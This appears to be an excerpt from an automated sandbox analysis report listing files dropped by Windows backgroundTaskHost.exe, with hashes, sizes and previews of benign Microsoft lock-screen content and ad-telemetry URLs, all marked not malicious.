                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRtct/:ZxMghwLtHSM1Sb9mSMXAvwRGt/
                                                                              MD5:43327A6EC4655E2605BD848AC8080B10
                                                                              SHA1:51276390FDD68D8B69D029D9BAFDF9997ACB79C5
                                                                              SHA-256:71AB8FD7D98622E359F365BA254575446940872D50B54702788BCD7F9BFFD727
                                                                              SHA-512:59446BBE0E47D93FABD768C886DBBA365A61A576F83006000F0D8D3F93E741DC3AC2DC0E606AB7B81AFDA56E76A6CBA18E55DCBC0A0E211E5D06DE690E9B092B
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.F.d.p.q.?.v.e.r.=.5.5.b.1...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.421963810396767
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRy4Uod:ZxMghwLtHSM1Sb9mSMXAvwRy
                                                                              MD5:C66BCF93ED9B2B486964DFDF8C3F8725
                                                                              SHA1:E8470CB4AA9AA86D45F7C4385B3108F02A01CDFF
                                                                              SHA-256:455B7863838C11F3A0B1C3AF86CAD3E0EC282893307EC0DB12B12A8501124678
                                                                              SHA-512:716FD3C99D8B83617378DBC142631F8BB7A603191A35EC4AC6A30B4025F441D521358C7AECE38F2A02421CA3A6C5A5B5745093C4DE960996C0FCBD69A838F344
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.W.I.E.t.?.v.e.r.=.b.6.5.3...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.3894363370336076
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRct:ZxMghwLtHSM1Sb9mSMXAvwR
                                                                              MD5:A27F678F172C642E24DE4740C5B2DBC3
                                                                              SHA1:36444729D96B371E3B182455FD5416A724875FF3
                                                                              SHA-256:BF27499FEA1EC1D167352764D5DE5CC87FCE82683C3F8CDB3E3A19086DEC5C82
                                                                              SHA-512:7846A476F6349EB719D781B6F529DCAAB21140067A54756A3C51E695B20E4C5FF74F5CA798181023D22860E9EA36C9E452EC003AB8A1B242033EB43F3EFA627F
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.P.l.T.B.?.v.e.r.=.2.a.9.4...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.414779436161726
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRGhtit/:ZxMghwLtHSM1Sb9mSMXAvwRG
                                                                              MD5:5DEFA2ED7476030EF2B061CC2497D806
                                                                              SHA1:AAC9CCE54C058128BC8F1B9C0B162A556D1C2664
                                                                              SHA-256:5F3096546980452D17067800A5F97C47B6763985DAD1026DE288065B9AEE2241
                                                                              SHA-512:0D840C0544B55E62F30BF3FD0836E0D282B2CFE6C322D3018D51E2784EDB496C4B5D6981B1683FE361D5ABD057B00295B7A2FC236BED21DB299E94432983889F
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.X.Q.V.g.?.v.e.r.=.a.c.2.7...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):276
                                                                              Entropy (8bit):3.411867361088877
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQi/Eom:ZxMghwLtHSM1Sb9mSMXAvh
                                                                              MD5:4C2CFF2D31F47CFED62B158B615A9DB3
                                                                              SHA1:6B071121D4F0D8D243EA3A07E58098C3CAF6A495
                                                                              SHA-256:9F604F89356B479FC4FF6CFC8EC5816D00EA7A571D54997DC507BFC1DB2E622A
                                                                              SHA-512:7A0F1EBB1103F75DA0BE5483F305D487D470E15C0B400430C043805ED93AF3763894E425073C136AD09C63A281F2760714BC3C14DCDCB4191997CFE9393BBBC4
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.y.Z.s.w.?.v.e.r.=.e.e.4.9...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):336
                                                                              Entropy (8bit):3.494251376306208
                                                                              Encrypted:false
                                                                              SSDEEP:6:Qeu01nAKmsy6AlS5CGQAffetXDdv5XY4ANJdlzYiL+5K5SaNy/NiFYlYl:Qeu01n+p65CGIz95INjzYiaU5SaNQsYm
                                                                              MD5:0DBEDE3B68F3ED30ABC129EEEEB122FB
                                                                              SHA1:1CAB11D94041C41909B5A073880E0BB76894844D
                                                                              SHA-256:3DDA5DF7B76DF231A735E49B4368C43E99BA133CDFC155A5FD1C0ACFBDA06B22
                                                                              SHA-512:BC594861367ADA6734E81787896EF7F4C716FF9854B90058D8A8E812877285CDA4D4A82986DE6743C03142E1264041F4D022F29319D954FA41DB00BBBDEE6F61
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".e.r.r.o.r.s.".:.[.{.".c.o.d.e.".:.2.0.4.0.,.".m.s.g.".:.".D.e.m.a.n.d. .s.o.u.r.c.e. .r.e.t.u.r.n.s. .e.r.r.o.r. .(.N.a.m.e.:. .G.N._.p.s.,. .E.r.r.o.r.:. .N.o. .e.l.i.g.i.b.l.e. .c.o.n.t.e.n.t...)...".}.].,.".r.e.f.r.e.s.h.t.i.m.e.".:.".2.0.2.2.-.0.7.-.2.0.T.1.9.:.5.3.:.3.8.".}.}.
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):336
                                                                              Entropy (8bit):3.494251376306208
                                                                              Encrypted:false
                                                                              SSDEEP:6:Qeu01nAKmsy6AlS5CGQAffetXDdv5XY4ANJdlzYiL+5K5SaNy/NiFYlYl:Qeu01n+p65CGIz95INjzYiaU5SaNQsYm
                                                                              MD5:0DBEDE3B68F3ED30ABC129EEEEB122FB
                                                                              SHA1:1CAB11D94041C41909B5A073880E0BB76894844D
                                                                              SHA-256:3DDA5DF7B76DF231A735E49B4368C43E99BA133CDFC155A5FD1C0ACFBDA06B22
                                                                              SHA-512:BC594861367ADA6734E81787896EF7F4C716FF9854B90058D8A8E812877285CDA4D4A82986DE6743C03142E1264041F4D022F29319D954FA41DB00BBBDEE6F61
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".e.r.r.o.r.s.".:.[.{.".c.o.d.e.".:.2.0.4.0.,.".m.s.g.".:.".D.e.m.a.n.d. .s.o.u.r.c.e. .r.e.t.u.r.n.s. .e.r.r.o.r. .(.N.a.m.e.:. .G.N._.p.s.,. .E.r.r.o.r.:. .N.o. .e.l.i.g.i.b.l.e. .c.o.n.t.e.n.t...)...".}.].,.".r.e.f.r.e.s.h.t.i.m.e.".:.".2.0.2.2.-.0.7.-.2.0.T.1.9.:.5.3.:.3.8.".}.}.
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):10378
                                                                              Entropy (8bit):5.36129020728065
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZSCSB5k5gBlnBlS9vt9UmSmjhrhsnLUL/Lg2LZ2L4LBLiL+L3LB:ZDC+WLmnGTcdg23
                                                                              MD5:608783D73861EF319E60DBD7490EE82B
                                                                              SHA1:DFE87B3C755B6488D45B3464D9CE37738F542EE5
                                                                              SHA-256:A02CDFB36337DC507562ADC3E29AA22C98608CDF73A650E898469D820FA3C53E
                                                                              SHA-512:BA0AAC27FE7A0D9CF3E7A0EAAC2F44C307B57E6F3468A5F53FFCAF6C88372B49F34FCF7D6A4BB70F81F0EA6FC05C21DDBC398B987E18DD86172238610C46F7B1
                                                                              Malicious:false
                                                                              Preview:https://ris.api.iris.microsoft.com/v1/a/pin?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=dd1a8e84fd1343a98117c17a02a03b24&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NMPJ99VJBWV&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=83a4606a9c604ec59350c94231b7a4ff&time=20220720T155447Z..https://ris.api.iris.microsoft.com/v1/a/impression?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=dd1a8e84fd1343a98117c17a02a03b24&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NMPJ99VJBWV&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=83a4606a9c604ec59350c94231b7a4ff&time=20220720T155448Z..https://ris.api.iris.microsoft.com/v1/a/pin?pg=PC000P0FR5.0
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2891
                                                                              Entropy (8bit):5.225642587566377
                                                                              Encrypted:false
                                                                              SSDEEP:48:eSES2LHfaGujPqLILqfsBubT+TkS8ZU+8Levau6NPqLILqfsBubT+TkSl:YzGyE6z+e8iAyE6z+F
                                                                              MD5:42D4299132893EF8141AF34C24DBBB92
                                                                              SHA1:32FEC784B8ADADE06F008FA913C7255398BA88C9
                                                                              SHA-256:18F3543B099494441385E2B2D35A6DDDA21BFB6F0EEC9DA22214AE89C84D7AD1
                                                                              SHA-512:7E42ADF6640F9224E638A839416183362D6801CEB86C6DA9048AD7BBEA33BFB7347B922FF0EC0A3E40631C47C383025BB0D5D564D9F1A4D12EFBDC8FBC09D834
                                                                              Malicious:false
                                                                              Preview:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106558&TID=700342085&CID=128000000001392729&BID=230696396&PG=PC000P0FR5.0000000IQ8&TPID=425106558&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID=b9de0c2b2b3648e8a125cac302df5505&TIME=20220720T155359Z&SLOT=2&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=62f7fc83080b4ea4bc961e27c15af7da&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACH
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):52590
                                                                              Entropy (8bit):3.858201201622904
                                                                              Encrypted:false
                                                                              SSDEEP:768:LmdAB13hYoOCVO82XMaqnkQAQqQf8nkcJ:Lmy9uu39kke
                                                                              MD5:39FA0B52E1D46BC8E3DCF5820F17AA9A
                                                                              SHA1:017E74C26A9CEC933BDA4D064DEAC9909CD3A004
                                                                              SHA-256:4A9686BE3A4B05DD922219DDF61A481265CEC3B6CB46758A8801B9EFD6E1D0F0
                                                                              SHA-512:C9C36FB9E8B3A12F1AE7AC7813A3A18C824FD47A422856FE628ADE8B8C83DA2C838855D1CBE49BAC578DC47A4B0461187E640CEC4B506C43D927DC94773BBBA6
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".n.a.m.e.\.".:.\.".L.o.c.k.S.c.r.e.e.n.\.".,.\.".p.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".p.o.r.t.r.a.i.t.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".s.h.o.w.I.m.a.g.e.O.n.S.e.c.u.r.e.L.o.c.k.\.".:.{.\.".i.s.O.p.t.i.o.n.a.l.\.".:.t.r.u.e.,.\.".t.y.p.e.\.".:.\.".b.o.o.l.e.a.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".f.i.l.e.S.i.z.e.\.".:.1.7.0.8.8.6.5.,.\.".h.e.i.g.h.t.\.".:.1.0.8.0.,.\.".s.h.a.2.5.6.\.".:.\.".D.0.H.X.2.8.n.y.
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):49190
                                                                              Entropy (8bit):3.863199191433258
                                                                              Encrypted:false
                                                                              SSDEEP:768:9fqoWqhrqFi+IITcimdQjDQjE1QjmhvzaTctltiZt7tip0+rWZTcC:9Smo4DITjmeglY+TuS540tZTN
                                                                              MD5:E43EBDDD8B2B9497A88F32D20707E27E
                                                                              SHA1:040D7C4180CF11B349801711C203279209443DAE
                                                                              SHA-256:9F2786F0CDB696D97AAB7A45258D35A8EEB8B3C0A337331788B112731669D514
                                                                              SHA-512:9B109383DF33EA2A64864C5995B1F23011C0B7A2FB1485F5A9C2277DEF1DAAA0366331115C72A21120A92CA83F8429FD58FB0FBD2CFE2D516F496A0C3B14CCCF
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".n.a.m.e.\.".:.\.".L.o.c.k.S.c.r.e.e.n.\.".,.\.".p.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".p.o.r.t.r.a.i.t.I.m.a.g.e.\.".:.{.\.".t.y.p.e.\.".:.\.".i.m.a.g.e.\.".}.,.\.".s.h.o.w.I.m.a.g.e.O.n.S.e.c.u.r.e.L.o.c.k.\.".:.{.\.".i.s.O.p.t.i.o.n.a.l.\.".:.t.r.u.e.,.\.".t.y.p.e.\.".:.\.".b.o.o.l.e.a.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".l.a.n.d.s.c.a.p.e.I.m.a.g.e.\.".:.{.\.".f.i.l.e.S.i.z.e.\.".:.6.4.7.1.1.1.,.\.".h.e.i.g.h.t.\.".:.1.0.8.0.,.\.".s.h.a.2.5.6.\.".:.\.".I.B.X.U.r.F.e.o.Q.
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8976
                                                                              Entropy (8bit):3.836508248417169
                                                                              Encrypted:false
                                                                              SSDEEP:96:LcTcgyUG8Kk4b/WfDwPdrj9O1WUFwPUrj9Tpk4btWfDwPdrj9YZV8iqj9/BUlk0H:LFK460PtcMUaP8U4w0Pt0IQlk0CRv5I
                                                                              MD5:0C22157A6362A735E625A7C4DC0E14A6
                                                                              SHA1:AFA79580F14CC01C09CA7EAF3D24E4A2A3FDBCB9
                                                                              SHA-256:063C89445F4AEBB18C4F28EDBB057052FC72221581F2B90168B377A9C3A6D06B
                                                                              SHA-512:10450031F9A15CF6FC05BB59211F226FF92072F7AC7327876B599B296D6FF91329BE3A7FE9A7F5DA8ADEFE5B247C98981F17BF589844BAAFA55922A21119285B
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".i.t.e.m.P.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.y.p.e.\.".:.\.".t.e.x.t.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".i.t.e.m.s.\.".:.[.{.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.e.x.t.\.".:.\.".h.i.d.d.e.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".e.v.e.n.t.\.".:.\.".n.o.n.e.\.".,.\.".p.a.r.a.m.e.t.e.r.s.\.".:.{.\.".c.o.l.l.e.c.t.i.o.n.I.d.\.".:.\.".S.t.a.r.t...S.u.g.g.e.s.t.i.o.n.s.\.".}.,.\.".a.c.t.i.o.n.\.".:.\.".a.d.d.T.i.l.e.T.o.C.o.l.l.e.c.t.i.o.n.\.".}.}.,.\.".t.r.a.c.k.i.n.g.\.".:.{.\.".e.v.e.n.t.s.\.".:.[.{.\.".i.d.\.
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9034
                                                                              Entropy (8bit):3.8389419525759414
                                                                              Encrypted:false
                                                                              SSDEEP:192:LFK460P6PGQMUaP66G84w0P6PGYfzGUzi8k0tRv50:LMs6CJ6Cs6ZfDziWzv50
                                                                              MD5:9644CCFBD455E59B2AB9E75391D768D0
                                                                              SHA1:D0A96630C8C1ADCF80D462FE0FEE6E1C76D1ABA4
                                                                              SHA-256:63C0508697C9A388F237E62296BF1D6B50411FCDA76AEA0FAA0D5ECC9686E564
                                                                              SHA-512:C6C569B4F603BC2840233751EB83E52B661E123DEC384C60599CD2B85E68726285D60BA1E6D5E4D9EE94A99B761EE8C562B1DEDC3C517E92C67E38DB8D9929CC
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".i.t.e.m.P.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.y.p.e.\.".:.\.".t.e.x.t.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".i.t.e.m.s.\.".:.[.{.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".t.e.m.p.l.a.t.e.T.y.p.e.\.".:.{.\.".t.e.x.t.\.".:.\.".h.i.d.d.e.n.\.".}.,.\.".o.n.R.e.n.d.e.r.\.".:.{.\.".e.v.e.n.t.\.".:.\.".n.o.n.e.\.".,.\.".p.a.r.a.m.e.t.e.r.s.\.".:.{.\.".c.o.l.l.e.c.t.i.o.n.I.d.\.".:.\.".S.t.a.r.t...S.u.g.g.e.s.t.i.o.n.s.\.".}.,.\.".a.c.t.i.o.n.\.".:.\.".a.d.d.T.i.l.e.T.o.C.o.l.l.e.c.t.i.o.n.\.".}.}.,.\.".t.r.a.c.k.i.n.g.\.".:.{.\.".e.v.e.n.t.s.\.".:.[.{.\.".i.d.\.
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1180
                                                                              Entropy (8bit):5.385151819577346
                                                                              Encrypted:false
                                                                              SSDEEP:24:2AsfLW9g/OOIpZK7//hAsfLW9g/OOIpZK7//gj:psToSOPpZGXhAsToSOPpZGXgj
                                                                              MD5:65EB33016D1B4DB2040CDF583EF3B758
                                                                              SHA1:D985B7345D3CA9850DFE057B0BE00A12D184B4CE
                                                                              SHA-256:BBD72E11FAC5826D991FF15DC5BD26489F550E2B696AC5E6855A3940D49FD44E
                                                                              SHA-512:3CE2100B43852145BF6888C684E38ED8E873DC0E027A8A03141EED770145E68ED9927612B623AEAE5A75449C892BCEEDDD4826F210CE62FFE9854AAFC6CBF705
                                                                              Malicious:false
                                                                              Preview:https://ris.api.iris.microsoft.com/v1/a/impression?CID=128000000000402926&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=400091688&UIT=P-&TargetID=700129702&AN=1538333990&PG=PC000P0FR5.0000000IRT&REQASID=73631FA46E444129A5A78BF513D8A83F&UNID=338388&ASID=2f9298d8ab8f4c23885c30ea9b373c83&PERSID=1A4A490328ED3BBECC8505EAE64E45F5&GLOBALDEVICEID=6966530473343700&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=5999d0853d524f7baa85da876e7b24cf&DEVOSVER=10.0.17134.1&REQT=20220720T155343&TIME=20220720T155416Z&ARCRAS=&CLR=CDM..https://ris.api.iris.microsoft.com/v1/a/impression?CID=128000000000402926&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=400091688&UIT=P-&TargetID=700129702&AN=1538333990&PG=PC000P0FR5.0000000IRT&REQASID=73631FA46E444129A5A78BF513D8A83F&UNID=338388&ASID=2f9298d8ab8f4c23885c30ea9b373c83&PERSID=1A4A490328ED3BBECC8505EAE64E45F5&GLOBALDEVICEID=69665304
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1603
                                                                              Entropy (8bit):5.214817274751045
                                                                              Encrypted:false
                                                                              SSDEEP:24:28yUqz/WYg7/vipZHe7bkU/56Dj3Ufi9LNUN5p+TUTrKVXciYsiIj:QUqLWY0XipZQIG56ccBu+T+qXTSa
                                                                              MD5:C2EAAC79F33CDDC20DEA38D33A68B3AA
                                                                              SHA1:04DA6D1AAC53BD0651061BAC156E125D0BA08AE2
                                                                              SHA-256:C04615ACF35192B5F259CBD0F5E9C80361B1ADB72BD7179D60AD6B7A5308E978
                                                                              SHA-512:718FFD51ABDAB257B434D425A0156E7B0738EE334BE9C228AD17B8675AB1B02FB630133A787B6DB0544AB948E0DCD60B4E3E4F361381AA056748DE7CC0F7DB24
                                                                              Malicious:false
                                                                              Preview:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=400091688&TID=700129702&CID=128000000000402926&BID=1538333990&PG=PC000P0FR5.0000000IRT&TPID=400091688&REQASID=73631FA46E444129A5A78BF513D8A83F&ASID=2f9298d8ab8f4c23885c30ea9b373c83&TIME=20220720T155417Z&SLOT=1&REQT=20220720T155343&MA_Score=2&PERSID=1A4A490328ED3BBECC8505EAE64E45F5&GLOBALDEVICEID=6966530473343700&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=5999d0853d524f7baa85da876e7b24cf&BCNT=1&PG=PC000P0FR5.0000000IRT&UNID=338388&MAP_TID=B79907B4-9D53-42CB-801D-E74EAEB938FB&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=73631FA46E444129A5A78BF513D8A83F&REQASID=73631FA46E444129A5A78BF513D8A83F&ARC=1&EMS=1&AUTH=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&ID=1A4A490328ED3BBECC8505EAE64E45F5&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611219&RAFB=0&MARKETBASEDCOUNTRY=US&C
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
